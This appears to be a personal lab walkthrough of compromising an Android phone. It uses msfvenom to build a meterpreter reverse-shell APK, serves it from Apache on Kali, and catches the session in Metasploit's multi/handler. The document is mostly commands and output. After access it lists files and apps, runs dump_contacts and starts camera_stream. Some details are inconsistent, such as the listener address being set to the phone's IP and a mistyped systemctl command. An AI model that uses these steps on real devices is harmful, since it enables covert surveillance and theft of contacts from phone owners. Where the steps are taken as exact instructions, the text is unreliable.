• Android IP Address: 192.168.22.167
  • host IP address: 192.168.22.20
  • KALI IP Address: 192.168.22.59
  • on Kali terminal1 to start apache2: #sudo service apache2 start
  • If you want to enable any service permanently: To start: #systemctl enable apache2 | To stop: #system disable apache2
  • on Kali terminal1 ┌──(mrhacker㉿kali)-[/var/www/html]
    └─$ sudo service apache2 status
    ● apache2.service – The Apache HTTP Server
    Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
    Active: active (running) since Thu 2021-08-19 07:31:40 EDT; 6s ago
  • on host broser check the status: http://192.168.22.59/index.html
  • on Kali terminal2: $ msfvenom –help
    MsfVenom – a Metasploit standalone payload generator.
  • on terminal1 Kali: ┌──(mrhacker㉿kali)-[~/Desktop]
    └─$ sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.22.59 LPORT=4444 R > /home/mrhacker/Desktop/androidApp.apk
    [sudo] password for mrhacker:
    [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
    [-] No arch selected, selecting arch: dalvik from the payload
    No encoder specified, outputting raw payload
    Payload size: 10191 bytes
  • on terminal1 Kali: cp -p androidApp.apk /var/www/html/
  • on Android phone: Browser: http://192.168.22.167/androidApp.apk
  • on Kali terminal2: $ msfconsole
  • msf6 > use exploit/multi/handler
    [*] Using configured payload generic/shell_reverse_tcp
    msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
    payload => android/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) >show options
  • msf6 exploit(multi/handler) > set LHOST 192.168.22.167
    LHOST => 192.168.22.167
  • msf6 exploit(multi/handler) > exploit[-] Handler failed to bind to 192.168.22.167:4444:- –
    [*] Started reverse TCP handler on 0.0.0.0:4444
    [*] Sending stage (77002 bytes) to 192.168.22.167
    [*] Meterpreter session 1 opened (192.168.22.59:4444 -> 192.168.22.167:39505) at 2021-08-19 07:59:07 -0400meterpreter > background
  • msf6 exploit(multi/handler) > sessions
  • msf6 exploit(multi/handler) > sessions i 1Active sessions
    ===============Id Name Type Information Connection
    — —- —- ———– ———-
    1 meterpreter dalvik/android u0_a209 @ localhost 192.168.22.59:4444 -> 192.168.22.167:39505 (192.168.22.167)

    msf6 exploit(multi/handler) > help

  • msf6 exploit(multi/handler) > sessions -i 1
    [*] Starting interaction with 1…meterpreter > pwd
    /data/data/com.metasploit.stage/files

meterpreter > ls -al
Listing: /
==========

Mode Size Type Last modified Name
—- —- —- ————- —-
40554/r-xr-xr– 0 dir 2021-08-18 13:11:50 -0400 acct
40000/——— 4096 dir 2021-08-19 07:43:24 -0400 cache
40000/——— 0 dir 2021-08-18 13:11:50 -0400 config
40554/r-xr-xr– 0 dir 1969-12-31 19:00:00 -0500 d
….
100444/r–r–r– 2166 fil 1969-12-31 19:00:00 -0500 ueventd.smdk4x12.rc
40554/r-xr-xr– 4096 dir 2016-06-08 10:29:50 -0400 vendor

 

meterpreter > app_list
Application List
================

Name Package Running IsSystem
—- ——- ——- ——–
AASAservice com.samsung.aasaservice false true
Active applications com.sec.android.widgetapp.activeapplicationwidget true true
Adapt Sound com.sec.hearingadjust false true
AllShare ControlShare Service com.sec.android.allshare.service.controlshare false true
AllShare FileShare Service com.sec.android.allshare.service.fileshare false true
Android System android false true
….
com.sec.phone com.sec.phone false true
ringtonebackup com.sec.android.app.ringtoneBR false true
wssyncmlnps com.wssnps false true

meterpreter > dump_contacts
[*] Fetching 1 contact into list
[*] Contacts list saved to: contacts_dump_20210819081459.txt
meterpreter >camera_stream